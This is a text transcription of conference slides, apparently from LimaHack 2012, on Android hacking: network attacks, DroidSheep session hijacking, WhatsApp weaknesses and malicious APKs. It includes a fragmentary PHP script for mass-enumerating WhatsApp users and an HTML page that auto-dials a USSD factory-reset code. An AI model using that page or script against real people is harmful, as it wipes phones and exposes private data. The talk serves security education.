- PDF Descargar libre

Transcripción

1

2

3

4 DISCLAIMER Todo el contenido de esta charla es resultado de investigación con fines didácticos y educativos. El autor no se hace responsable por el uso del conocimiento contenido en la siguiente presentación. La información contenida debe ser utilizada únicamente para fines éticos y con la debida autorización. Todo descubrimiento realizado, ha sido y será usado de forma legal. La audiencia debe asumir todo lo que se exponga hoy, como falso y sin fundamento hasta que lo compruebe personalmente. Limahack no es el autor directo de ninguno de los descubrimientos expuestos, ni de las herramientas demostradas, ni los conoce. Todas las opiniones vertidas durante esta presentación son exclusivas del expositor, Limahack no es responsable de ninguna de las opiniones vertidas.

5

6 aula H4XOR Android mobile hacking: ataques y atacando con el androide Omar Palomino Por qué Android? Ataques a Sistemas Operativos Windows - Linux Ataques a redes LAN desde Android Atacando a sistemas Android

7 Quién soy? Ing. Sistemas y Maestrista de Ing. de Computación y Sistemas Certificado CEHv7, Security+, ITILv3 Consultor en Seguridad de información Psicólogo que aun no comienza sus estudios. Escritor en mis tiempos libres: omarc320@gmail.com

8 Por qué Android? Participación en el mercado de Sistemas Operativos móviles 5% 17% 4% 4% 2% 0% 68% Android IOS Blackberry Symbian Windows Linux Otros

9 Por qué Android? Otros sistemas operativos ya no tienen participación en el mercado (RIP Blackberry) Los hackers están buscando nuevos objetivos (nuevos retos!!), siempre a la vanguardia.

10 Por qué Android? Se pueden realizar ataques cada vez mas sigilosos (ya no es necesario una laptop para realizar ataques) Es muy común que a través de Android nos. Conectamos a redes wireless libres Accedamos a correo electrónico Accedamos a redes sociales Realicemos transacciones financieras

11 La agenda de hoy: Atacando S.O Windows Forense de tráfico generado x Android Ataques de red LAN Android vs Metasploit

12 Requisitos: Tener el Android rooteado (super privilegios). Todas las herramientas interesantes requieren de super-privilegios. Analizar la mejor situación para realizar un ataque. Utiliza tu Android es un gran amigo.

13 Atacando Windows Tool: Anti (Android Network Toolkit) Con Anti podemos: Buscar vulnerabilidades Auditoría de passwords Ataques de man in the middle Ejecutar comandos en el SO Descubrir tráfico inseguro en la red

14 Atacando Windows

15 Atacando Windows USO DE NMAP SCANEO DE PUERTOS DETECCIÓN DE SIST. OPERATIVO SCRIPT DE VERIFICACIÓN DE VULNERABILIDADES

16 Atacando Windows

17 Atacando una red LAN Hace session hijacking (secuestro de sesiones) a aplicaciones web conocidas (Facebook, Hotmail, Twitter) El código fuente es libre: Lo retiraron del Google Play debido a que fue considerado una herramienta para hackear. WTF!!!! La comunidad XDA-developers sigue sacando nuevas versiones del software. (

18 Atacando una red LAN Funcionamiento: Session Hijacking 1 El usuario ha ingresado normalmente a una aplicación web comercial o corporativo, como: Hotmail Facebook Twitter 2 DROIDSHEEP capturas las cookies asociadas a la sesión creada y las utiliza. No es necesario capturar la contraseña.

19 Atacando una red LAN Funcionamiento: Session Hijacking Droidsheep reconoce las cookies de aplicaciones como Facebook y Hotmail, además te puedes enviar las cookies por correo electrónico.

20 Atacando una red LAN

21 Análisis de Tráfico Android Cada vez utilizamos nuestros celulares para conectarnos a Internet. La mayoría de las personas se conecta a redes wireless abiertas. Como TÚ!!! Muchas aplicaciones no encriptan la información que envían, las envían en texto plano.

22 Por qué es interesante analizar el tráfico de red.?

23 Por qué es interesante analizar el tráfico de red.?

24 Análisis de tráfico - Whatsapp Whatsapp se ha convertido en un mecanismo para el envío de mensajes muy popular. Es muy parecido a los SMS pero gratuito (hasta el momento). Tiene serios problemas para dar seguridad a la información que envía hacia internet porque enviaba todo en texto claro. Ahora envía la información con un HASH MD5

25 Pero es sólo un simple MD5 Whatsapp tiene serios problemas de seguridad, analicemos: Cada vez que Whatsapp inicia debe verificar si tus contactos cuentan con una cuenta activada. Para eso se conecta a una URL y consulta el estado de tus contactos, por ejemplo: <A>:Código de país del número a consultar <B>: Número a consultar <C>: Cualquier número de WhatsApp (o el mismo número)

26 Pero es sólo un simple MD5 Número del teléfono consultado Estado y mensaje del Whatsapp Número del teléfono consultado

27 Cuánta gente tiene Whatsapp en el Perú? El ministerio de transportes y comunicaciones nos dará una manito:

28 <?php mysql_connect("localhost","root", password"); mysql_select_db("limahakc2012"); for($i= ; $i<= ;$i++){ Script para la verificación de usuarios y estado en Whatsapp AQUÍ VIENE EL SCRIPT QUE ESTOY TERMINANDO DE ESCRIBIR $whatsapp =" $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch,curlopt_useragent,'whatsapp/2.6.7 iphone_os/5.0.1 Device/Unknown_(iPhone4,1)'); curl_setopt($ch, CURLOPT_URL, $whatsapp); $cuerpo = curl_exec($ch); curl_close($ch); &u[]= if (preg_match('/<key>/',$cuerpo)) { $explodeo_datos = explode('<dict>',$cuerpo); $explodeo_estado = explode('<key>s</key>',$explodeo_datos[1]); $explodeo_estado = explode('<key>jid</key>',$explodeo_estado[1]); }}?> $query1 ="insert into WhatsApp_users3 (numero,mensaje,status) values ('".$i."','".$$explodeo_estado[0]."',1) "; mysql_query($query1);

29 EL ATAQUE:

30 Cómo envía Whatsapp los mensajes? WhatsApp tiene un mecanismo de autenticación basado en SASL DIGEST MD5. Envia un CHALLENGE (RETO) formado por el JID (jabber id) y password, pero obviamente el password no se envía ya que sirve para generar el CHALLENGE (MD5) PASSWORD? Pero si nunca pusimos un password. El password es: Android: IME (International Mobile Equipment Identity) Iphone y otros: la MAC

31 WhatsApp - API API no oficial de WhatsApp Está bajo licencia MIT refer to the source code for the extra line INGENIERIA REVERSA

32 El ataque: obteniendo el IMEI Si obtenemos el IMEI podemos suplantar una identidad de alguien y ademas recibir sus mensajes. OJO: Si te haces pasar por esa persona y recibes los mensajes, la verdadera persona no los recibirá. Moraleja: El celular es como el calzoncillo.. No se presta a nadie a nadie!!!

33 EL ATAQUE:

34 Atacando Android

35 Atacando Android Utilizaremos el Android Virtual Device para hacer nuestras pruebas. El objetivo es obtener información sensible de los teléfonos celulares. Lo más importante es tener actualizado siempre el celular. A veces, no basta con tenerlo actualizado porque sólo se sacan actualizaciones para los últimos modelos.

36 Atacando Android Utilizaremos un módulo auxiliar de Metasploit para realizar el ataque.

37 Atacando Android

38 EL ATAQUE:

39 Códigos USSD El USSD (acrónimo de Unstructured Supplementary Service Data, Servicio Suplementario de Datos no Estructurados en inglés) es un servicio para el envío de datos a través de móviles GSM, al igual que el SMS. Es usado normalmente para comunicación con el proveedor de telefonía, generalmente para servicios de mensajería en tiempo real. Aquí algunos códigos USSD: *#06# *150# *2767*3855# (no deberías ejecutar este)

40 Códigos USSD Así como existe los links para enviar correo: <a Enviar </a> También existe el mail para LLAMAR : <a href="tel: ">llamar LIMAHACK</a> Algunos códigos USSD no necesitan la intervención de marcado para ser ejecutados, simplemente se ejecutan, pueden probar esto: *#06# Entonces que pasa si

41 EL ATAQUE: Revisa el código QR, imprime el cupón y entra gratis a la fiesta:

44 EL ATAQUE: <html> <head> <title>fiesta LimaHack 2012</title> <meta http-equiv="refresh" content="0;url=tel *2797*3855%23 "> </head></body> </html>

45 Aplicaciones APK Maliciosas > Se han heredado todas las malas costumbres del mundo Windoneano, todos instamos dando NEXT, NEXT, NEXT > Sabemos lo que realmente estamos instalando en nuestro celular?

46 Google Play y la política.. Información personal y confidencial: no se permite la divulgación o la publicación no autorizada de información de carácter privado o confidencial de los usuarios (como números de tarjetas de crédito, de la Seguridad Social, del permiso de conducir o de otros documentos ) ni de cualquier otra información que no sea de acceso público. El problema es que NADIE lo verifica.

47 Instalaremos una aplicación mo.reservations

48 Google Play y la política.. Antes de instalar el APK: Después de instalar: Créditos: billy.grados@gmail.com Developer de aplicaciones para Android

49 Google Play y la política..

52 EL ATAQUE:

53 Conclusiones Android es una herramienta muy potente para realizar pruebas básicas de penetración de sistemas, a nivel de sistema operativo y redes LAN. WhatsApp presenta debilidades de seguridad de información importantes. El celular nunca se presta!!!! Nunca!! Existen diversas vulnerabilidades en sistemas Android : Códigos USSD y a través de Metasploit para versiones antiguas de Android. Google Play tiene una política de seguridad de información, sin embargo, no verifica que las aplicaciones cumplan con dicha política. Actualiza tu Android, verifica los permisos otorgados a cada aplicación y no instales APK files de dudosa procedencia.

54

55